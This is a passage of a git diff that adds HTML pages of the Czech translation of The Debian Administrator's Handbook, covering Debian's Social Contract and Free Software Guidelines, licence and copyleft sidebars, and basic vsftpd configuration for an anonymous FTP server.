+            href="sect.debian-internals.html"><strong>Předcházející</strong>1.3. Vnitřní fungování projektu Debian</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.role-of-distributions.html"><strong>Další</strong>1.5. The Role of Distributions</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.foundation-documents.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.foundation-documents.html
new file mode 100644
index 000000000..e463fe092
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.foundation-documents.html
@@ -0,0 +1,413 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.2. Dokumenty nadace</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="next"
+        href="sect.debian-internals.html"
+        title="1.3. Vnitřní fungování projektu Debian" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.foundation-documents.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="the-debian-project.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.debian-internals.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.foundation-documents"></a>1.2. Dokumenty nadace</h2></div></div></div><a
+          id="id-1.4.5.2"
+          class="indexterm"></a><div
+          class="para">
+			Několik let po prvotním vydání, Debian formálně stanovil principy, které by měl dodržovat jako svobodný software. Toto úmyslně aktivistické rozhodnutí umožňuje řádný a bezproblémový růst tím, že zajistí, aby se všechny části ubíraly stejným směrem. K tomu, aby se stal vývojářem Debianu, musí každý uchazeč potvrdit a prokázat svou podporu a dodržování zásad stanovených v nadačních dokumentech projektu.
+		</div><div
+          class="para">
+			Proces vývoje je neustále projednáván, ale tyto nadační dokumenty jsou obecně a shodně podporovány, a tak zřídka měněny. Stanovy Debianu nabízí také další záruky pro jejich stálost: ke schválení jakékoliv jejich změny je potřeba tří čtvrtin kvalifikované většiny.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.social-contract"></a>1.2.1. Závazek vůči uživatelům</h3></div></div></div><a
+            id="id-1.4.5.5.2"
+            class="indexterm"></a><a
+            id="id-1.4.5.5.3"
+            class="indexterm"></a><div
+            class="para">
+				Projekt má také “společenskou smlouvu”. Jaké místo má takovýto text v projektu, který je určen pouze pro vývoj operačního systému? To je docela jednoduché: Debian pracuje pro své uživatele, a tím potažmo i pro společnost. Tato smlouva shrnuje závazky, ke kterým se projekt zavazuje. Dovolte nám je podrobněji popsat:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="orderedlist"><ol><li
+                class="listitem"><div
+                  class="para">
+						Debian zůstane ze 100% zdarma.
+					</div><div
+                  class="para">
+						Toto je pravidlo č. 1. Debian je a zůstane zcela a výhradně složen z volného softwaru. Navíc, veškerý vývoj softwaru sám o sobě v rámci projektu Debian, bude zdarma.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>POHLED</em></span>za software</strong></p></div></div></div><div
+                    class="para">
+						První verze sociální smlouvy Debianu říkala “Debian zůstane 100% svobodný <span
+                      class="emphasis"><em>software</em></span>”. Vyouštění tohoto slova (se schválením verze 1.1 smlouvy v dubnu 2004) naznačuje vůli dosáhnout svobody, a to nejen v softwaru, ale také v dokumentaci a jakémkoliv jiném prvku, který Debian chce poskytovat v rámci svého operačního systému.
+					</div><div
+                    class="para">
+						Tato změna, která byla zamýšlena pouze jako redakční, měla ve skutečnosti četné následky, zejména v odstranění některé problematické dokumentace. Navíc, problém představuje také stále častější používání firmwaru v ovladačích: mnohé z nich nejsou volné, ale jsou nezbytné pro správné fungování odpovídajícího hardwaru.
+					</div></div></li><li
+                class="listitem"><div
+                  class="para">
+						Vratíme se zpět ke komunitě svobodného softwaru.
+					</div><div
+                  class="para">
+						Jakékoli zlepšení, kterým projekt Debian přispěl k práci zahrnuté v distribuci, je zasláno zpět autorovi ( tzv. “upstream”). Obecně, Debian bude spolupracovat s komunitou spíše, než pracovat v izolaci.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>KOMUNITA</em></span> Upstreamový autor nebo vývojář Debianu?</strong></p></div></div></div><a
+                    id="id-1.4.5.5.5.2.3.2"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.5.5.2.3.3"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.5.5.2.3.4"
+                    class="indexterm"></a><div
+                    class="para">
+						Termínem “upstreamový autor” se rozumí autor (autoři) / vývojář (vývojáři) díla, ti, kteří ho píší a vyvíjí. Na druhou stranu, “vývojář Debianu” používá už existující práci a zahrnuje ji do balíku Debianu (termín “správce Debianu” je vhodnější).
+					</div><div
+                    class="para">
+						V praxi se takové rozlišování často nepovažuje za jednoznačné. Správce Debianu může napsat opravu, která prospívá všem uživatelům díla. Obecně Debian podporuje ty, kteří mají balíček v Debianu na starosti, aby se také zapojili do “upstreamového” vývoje (tak se potom stanou přispěvateli, aniž by byli omezeni na roli pouhých uživatelů programu).
+					</div></div></li><li
+                class="listitem"><div
+                  class="para">
+						Nebudeme skrývat problémy.
+					</div><div
+                  class="para">
+						Debian není dokonalý a nové problémy, které je třeba opravit budeme nacházet každý den. Celou databázi chybových hlášení budeme mít pro veřejnost kdykoliv otevřenou k nahlédnutí. Hlášení, která lidé zakládají online se okamžitě zviditelní ostatním.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Našimi prioritami jsou naši uživatelé a svobodný software.
+					</div><div
+                  class="para">
+						Tento závazek je obtížnější definovat. Debian ukládá, tedy pokud je zapotřebí učinit rozhodnutí, zahodit pro vývojáře jednoduché řešení, které bude ohrožovat uživatelskou přívětivost, rozhodout se pro elegantnější řešení, i když je obtížnější ho realizovat. To znamená, že prioritou je zohlednit zájmy uživatelů a volného softwaru.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Práce, které nesplňují naše standardy volného softwaru.
+					</div><div
+                  class="para">
+						Debian akceptuje a chápe, že uživatelé mohou chtít používat některé programy, co nejsou volné. Proto projekt umožňuje využití částí své infrastruktury k distribuci debianovských balíčků nesvobodného softwaru, které lze bezpečně předistribuovat.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>KOMUNITA</em></span> Pro nebo proti nesvobodné sekci?</strong></p></div></div></div><a
+                    id="id-1.4.5.5.5.5.3.2"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.5.5.5.3.3"
+                    class="indexterm"></a><div
+                    class="para">
+						Závazek udržovat strukturu pro přizpůsobení nesvobodného softwaru (tj. “nesvobodná” sekce, viz postranní panel <a
+                      class="xref"
+                      href="apt.html#sidebar.sections"><span
+                        class="emphasis"><em>VOCABULARY</em></span> The <code
+                        class="literal">main</code>, <code
+                        class="literal">contrib</code> and <code
+                        class="literal">non-free</code> archives</a>) je často předmětem debaty v rámci komunity Debianu.
+					</div><div
+                    class="para">
+						Odpůrci tvrdí, že se to odvrací lidi od volných softwarových ekvivalentů, a je v rozporu se zásadou ve věci poskytování pouze svobodného software. Příznivci nekompromisně konstatují, že většina nesvobodných balíků jsou “téměř zdarma”, a zadržovány jedním nebo dvěma otravnými omezeními (nejběžnější je zákaz komerčního používání softwaru). Distribucí těchto děl v nesvobodné větvi, nepřímo říkáme autorovi, že jeho dílo by bylo lépe známé a hojně používané, pokud by bylo zahrnuto v hlavní sekci. Jsou tak zdvořile vyzváni, aby změnili svou licenci tak, aby vyhovovala tomuto záměru.
+					</div><div
+                    class="para">
+						Po prvním, bezvýsledném pokusu v roce 2004, je navrácení úplného odstranění nesvobodné sekce na pořad jednání nepravděpodobné, zejména proto, že obsahuje mnoho užitečných dokumentů, které byly přesunuty jednoduše proto, že nesplňovaly nové požadavky pro hlavní část. To platí zejména pro některé soubory dokumentace softwaru vydané projektem GNU (zejména Emacs a Make).
+					</div><div
+                    class="para">
+						Pokračující existence nesvobodné sekce je zdrojem příležitostných třenic s Nadací svobodného softwaru, a je hlavním důvodem, proč odmítá oficiálně doporučit Debian jako operační systém.
+					</div></div></li></ol></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.dfsg"></a>1.2.2. Pokyny Debianu pro svobodný software</h3></div></div></div><a
+            id="id-1.4.5.6.2"
+            class="indexterm"></a><a
+            id="id-1.4.5.6.3"
+            class="indexterm"></a><a
+            id="id-1.4.5.6.4"
+            class="indexterm"></a><a
+            id="id-1.4.5.6.5"
+            class="indexterm"></a><div
+            class="para">
+				Tento referenční dokument určuje, který software je “dostatečně volný”, aby byl zahrnut do Debianu. Pokud je licence programu v souladu s těmito zásadami, může být zahrnuta do hlavní části; Naopak, a za předpokladu, že volné šíření je zakázáno, jej lze nalézt v nesvobodné sekci. Nesvobodná sekce není oficiální součástí Debianu; Jedná se o přidanou službu poskytovanou uživatelům.
+			</div><div
+            class="para">
+				Více než jen výběrovými kritérii pro Debian, se tento text se stal autoritou na téma svobodného softwaru, a sloužil jako základ pro “definici Open Source”. Historicky je tedy jednou z prvních formálních definic pojmu “svobodný software”.
+			</div><div
+            class="para">
+				Všeobecná veřejná licence GNU, BSD licence a Umělecká licence jsou příklady tradičních svobodných licencí, které ctí 9 bodů uvedených v tomto textu. Níže najdete text, který je publikován na webových stránkách Debianu. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.debian.org/social_contract#pokyny">http://www.debian.org/social_contract#pokyny</a></div>
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="orderedlist"><ol><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Volná redistribuce.</div>
+							Licence na jakoukoliv součást Debianu nesmí omezovat žádnou stranu v prodeji nebo darování softwaru jako součásti souhrnné distribuce softwaru obsahující programy z několika různých zdrojů. Licence nesmí zahrnovat honorář nebo jiný poplatek za tento prodej.
+						</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span>Svobodná licence</strong></p></div></div></div><a
+                    id="id-1.4.5.6.9.1.2.2"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.3"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.4"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.5"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.6"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.7"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.8"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.1.2.9"
+                    class="indexterm"></a><div
+                    class="para">
+						GNU GPL, BSD licence a Umělecká licence jsou v souladu s Pokyny Debianu pro svobodný software, i když jsou velmi odlišné.
+					</div><div
+                    class="para">
+						GNU GPL, kterou používá a propaguje FSF (Free Software Foundation), je nejběžnější. Její hlavní vlastností je, že se vztahuje i na práci z ní vycházející, která se redistribuje: program zahrnující nebo používající GPL kód může být distribuován pouze v souladu s jeho podmínkami. Zakazuje tedy jakékoli opětovné použití v proprietární aplikaci. To představuje vážné problémy při opětovném použití GPL kódu ve volném softwaru nevyhovujícímu této licenci. Takto je někdy nemožné propojit program zveřejněný pod jinou licencí svobodného softwaru s knihovnou distribuovanou pod GPL. Na druhou stranu, tato licence je velmi pevná v základech v americkém právu: právníci FSF se podíleli na jejím navrhování, takže narušitelé jsou často nuceni dosáhnout přátelské dohody s FSF, aniž by se šlo k soudu. <div
+                      xmlns=""
+                      class="url">→ <a
+                        xmlns="http://www.w3.org/1999/xhtml"
+                        href="http://www.gnu.org/copyleft/gpl.html">http://www.gnu.org/copyleft/gpl.html</a></div>
+					</div><div
+                    class="para">
+						The BSD license is the least restrictive: everything is permitted, including use of modified BSD code in a proprietary application. <div
+                      xmlns=""
+                      class="url">→ <a
+                        xmlns="http://www.w3.org/1999/xhtml"
+                        href="http://www.opensource.org/licenses/bsd-license.php">http://www.opensource.org/licenses/bsd-license.php</a></div>
+					</div><div
+                    class="para">
+						Nakonec, Umělecká licence dosahuje kompromisu mezi těmito ostatními dvěma: je povoleno zahrnuzí kódu do proprietární aplikace, ale jakákoliv modifikace musí být zveřejněna. <div
+                      xmlns=""
+                      class="url">→ <a
+                        xmlns="http://www.w3.org/1999/xhtml"
+                        href="http://www.opensource.org/licenses/artistic-license-2.0.php">http://www.opensource.org/licenses/artistic-license-2.0.php</a></div>
+					</div><div
+                    class="para">
+						Kompletní znění těchto licencí je k dispozici v <code
+                      class="filename">/usr/share/Common-licenses/</code> v libovolném systému Debianu.
+					</div></div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Zdrojový kód.</div>
+							Program musí obsahovat zdrojový kód a musí umožňovat distribuci ve zdrojovém kódu, stejně jako v kompilované podobě.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Odvozená díla.</div>
+							Licence musí umožňovat úpravy a odvozená díla, a musí umožňovat jejich distribuci za stejných podmínek jako měla licence původního softwaru.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Integrita zdrojového kódu autora.</div>
+							Licence může omezit distribuci zdrojového kódu v modifikované podobě <span
+                    class="emphasis"><em>pouze</em></span> pokud licence umožňuje distribuci “patch souborů” se zdrojovým kódem pro účely úpravy programu v okamžiku sestavení. Licence musí výslovně umožňovat distribuci softwaru vytvořeného z modifikovaného zdrojového kódu. Licence může vyžadovat, aby odvozená díla nesla název nebo číslo odlišné od původního softwaru (<span
+                    class="emphasis"><em>Toto je kompromis. Skupina Debian nabádá všechny autory, aby nezakazovali úpravy souborů, zdrojových nebo binárních</em></span>).
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Žádná diskriminace osob nebo skupin.</div>
+							Licence nesmí diskriminovat žádnou osobu ani skupinu osob.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Diskriminace proti žádné oblasti lidského úsilí.</div>
+							Licence nesmí nikomu bránit v užívání programu v konkrétní oblasti lidského úsilí. Například nesmí zakazovat používání programu v podnicích nebo při genetickém výzkumu.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Přenesení licence.</div>
+							Práva spojená s programem se musí vztahovat na všechny, komu je program distribuován bez nutnosti provedení dodatečné licence těmito stranami.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Licence nemůže být pro Debian specifická.</div>
+							Práva spojená s programem nemůžou záviset na tom, že je program součástí systému Debian. Pokud je program vyjmut z Debianu a používán nebo distribuován bez Debianu, ale jinak v rámci podmínek licence programu, všechny strany, kterým je program distribuován, by měly mít stejná práva jako ta, která jsou udělena ve spojení se systémem Debian.
+						</div></li><li
+                class="listitem"><div
+                  class="para"><div
+                    class="title">Licence nesmí kontaminovat jiný software.</div>
+							Licence nesmí omezovat ostatní software, který je distribuován spolu s licencovaným softwarem. Například, licence nesmí trvat na tom, že všechny ostatní programy distribuované na stejném médiu musí být svobodný software.
+						</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Copyleft</strong></p></div></div></div><a
+                    id="id-1.4.5.6.9.9.2.2"
+                    class="indexterm"></a><a
+                    id="id-1.4.5.6.9.9.2.3"
+                    class="indexterm"></a><div
+                    class="para">
+						Copyleft je princip, který spočívá v používání autorských práv k zaručení svobody díla a děl z něho odvozených, spíše než k omezení práv na užívání, jako je tomu u proprietárního softwaru. Je to také hra se slovy z pojmu “Copyright”. Richard Stallman přišel na tuto myšlenku, když mu jeho přítel, co má rád slovní hříčky, napsal na jemu adresovanou obálku: “copyleft: všechna práva obrácena”. Copyleft ukládá zachování všech počátečních svobod po distribuci původní nebo modifikované verze díla (obvykle programu). Není tedy možné distribuovat program jako proprietární software, pokud je odvozen z kódu programu, který byl vydán pod copyleftem.
+					</div><div
+                    class="para">
+						Nejznámější skupinou copyleftových licencí je samozřejmě GNU GPL a její deriváty, GNU LGPL nebo Nižší všeobecná veřejná licence a GNU FDL nebo GNU Svobodná licence pro dokumentaci. Je smutné, že copyleftové licence jsou obyčejně vzájemně neslučitelné. V důsledku toho je nejlepší použít pouze jednu z nich.
+					</div></div></li></ol></div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.bruce-perens"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KOMUNITA</em></span> Bruce Perens, kontroverzní vůdce</strong></p></div></div></div><a
+              id="id-1.4.5.6.10.2"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.3"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.4"
+              class="indexterm"></a><div
+              class="para">
+				Bruce Perens byl druhým vedoucím projektu Debian, těsně po Ianu Murdockovi. Byl velmi kontroverzní ve svých dynamických a autoritářských metodách. Přesto zůstává důležitým přispěvatelem Debianu, jemuž je Debian obzvláště zavázán pro sestavení věhlasných “Směrnic Debianu pro svobodný software” (DFSG), původní myšlenky Eana Schuesslera. Následně, Bruce z nich odvodil slavnou “Definici pro Open Source”, kdy z nich odstranil všech odkazy na Debian. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.opensource.org/">http://www.opensource.org/</a></div>
+			</div><div
+              class="para">
+				Jeho odchod z projektu byl dost emotivní, ale Bruce zůstal silně připojený k Debianu, protože stále pokračuje v propagaci této distribuce v politických a ekonomických sférách. Stále se sporadicky objevuje na e-mailových konferencích, aby přispěl svou radou a představil své nejnovější iniciativy ve prospěch Debianu.
+			</div><a
+              id="id-1.4.5.6.10.7"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.8"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.9"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.10"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.11"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.12"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.13"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.14"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.15"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.16"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.17"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.18"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.19"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.20"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.21"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.22"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.23"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.24"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.25"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.26"
+              class="indexterm"></a><a
+              id="id-1.4.5.6.10.27"
+              class="indexterm"></a><div
+              class="para">
+				Last anecdotal point, it was Bruce who was responsible for inspiring the different “codenames” for Debian versions (1.1 — <span
+                class="distribution distribution">Rex</span>, 1.2 — <span
+                class="distribution distribution">Buzz</span>, 1.3 — <span
+                class="distribution distribution">Bo</span>, 2.0 — <span
+                class="distribution distribution">Hamm</span>, 2.1 — <span
+                class="distribution distribution">Slink</span>, 2.2 — <span
+                class="distribution distribution">Potato</span>, 3.0 — <span
+                class="distribution distribution">Woody</span>, 3.1 — <span
+                class="distribution distribution">Sarge</span>, 4.0 — <span
+                class="distribution distribution">Etch</span>, 5.0 — <span
+                class="distribution distribution">Lenny</span>, 6.0 — <span
+                class="distribution distribution">Squeeze</span>, 7 — <span
+                class="distribution distribution">Wheezy</span>, 8 — <span
+                class="distribution distribution">Jessie</span>, 9 — <span
+                class="distribution distribution">Stretch</span>, 10 (not released yet) — <span
+                class="distribution distribution">Buster</span>, 11 (not released yet) — <span
+                class="distribution distribution">Bullseye</span>, <span
+                class="distribution distribution">Unstable</span> — <span
+                class="distribution distribution">Sid</span>). They are taken from the names of characters in the Toy Story movie. This animated film entirely composed of computer graphics was produced by Pixar Studios, with whom Bruce was employed at the time that he led the Debian project. The name “Sid” holds particular status, since it will eternally be associated with the <span
+                class="distribution distribution">Unstable</span> branch. In the film, this character was the neighbor child, who was always breaking toys — so beware of getting too close to <span
+                class="distribution distribution">Unstable</span>. Otherwise, <span
+                class="distribution distribution">Sid</span> is also an acronym for “Still In Development”.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="the-debian-project.html"><strong>Předcházející</strong>Kapitola 1. Projekt Debian</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.debian-internals.html"><strong>Další</strong>1.3. Vnitřní fungování projektu Debian</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ftp-file-server.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ftp-file-server.html
new file mode 100644
index 000000000..766c48e2f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.ftp-file-server.html
@@ -0,0 +1,108 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.3. FTP File Server</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.http-web-server.html"
+        title="11.2. Web Server (HTTP)" /><link
+        rel="next"
+        href="sect.nfs-file-server.html"
+        title="11.4. NFS File Server" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.ftp-file-server.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.http-web-server.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.nfs-file-server.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.ftp-file-server"></a>11.3. FTP File Server</h2></div></div></div><a
+          id="id-1.14.6.2"
+          class="indexterm"></a><div
+          class="para">
+			FTP (<span
+            class="emphasis"><em>File Transfer Protocol</em></span>) is one of the first protocols of the Internet (RFC 959 was issued in 1985!). It was used to distribute files before the Web was even born (the HTTP protocol was created in 1990, and formally defined in its 1.0 version by RFC 1945, issued in 1996).
+		</div><div
+          class="para">
+			This protocol allows both file uploads and file downloads; for this reason, it is still widely used to deploy updates to a website hosted by one's Internet service provider (or any other entity hosting websites). In these cases, secure access is enforced with a user identifier and password; on successful authentication, the FTP server grants read-write access to that user's home directory.
+		</div><div
+          class="para">
+			Other FTP servers are mainly used to distribute files for public downloading; Debian packages are a good example. The contents of these servers is fetched from other, geographically remote, servers; it is then made available to less distant users. This means that client authentication is not required; as a consequence, this operating mode is known as “anonymous FTP”. To be perfectly correct, the clients do authenticate with the <code
+            class="literal">anonymous</code> username; the password is often, by convention, the user's email address, but the server ignores it.
+		</div><div
+          class="para">
+			Many FTP servers are available in Debian (<span
+            class="pkg pkg">ftpd</span>, <span
+            class="pkg pkg">proftpd-basic</span>, <span
+            class="pkg pkg">pyftpd</span> and so on). The Falcot Corp administrators picked <span
+            class="pkg pkg">vsftpd</span> because they only use the FTP server to distribute a few files (including a Debian package repository); since they don't need advanced features, they chose to focus on the security aspects.
+		</div><a
+          id="id-1.14.6.7"
+          class="indexterm"></a><div
+          class="para">
+			Installing the package creates an <code
+            class="literal">ftp</code> system user. This account is always used for anonymous FTP connections, and its home directory (<code
+            class="filename">/srv/ftp/</code>) is the root of the tree made available to users connecting to this service. The default configuration (in <code
+            class="filename">/etc/vsftpd.conf</code>) requires some changes to cater to the simple need of making big files available for public downloads: anonymous access needs to be enabled (<code
+            class="literal">anonymous_enable=YES</code>) and read-only access of local users needs to be disabled (<code
+            class="literal">local_enable=NO</code>). The latter is particularly important since the FTP protocol doesn't use any form of encryption and the user password could be intercepted over the wire.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.http-web-server.html"><strong>Předcházející</strong>11.2. Web Server (HTTP)</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.nfs-file-server.html"><strong>Další</strong>11.4. NFS File Server</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-debian.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-debian.html
new file mode 100644
index 000000000..d56d170b1
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.future-of-debian.html
@@ -0,0 +1,98 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">16.2. Debian's Future</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Future, Improvements, Opinions" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="conclusion.html"
+        title="Kapitola 16. Conclusion: Debian's Future" /><link
+        rel="prev"
+        href="conclusion.html"
+        title="Kapitola 16. Conclusion: Debian's Future" /><link
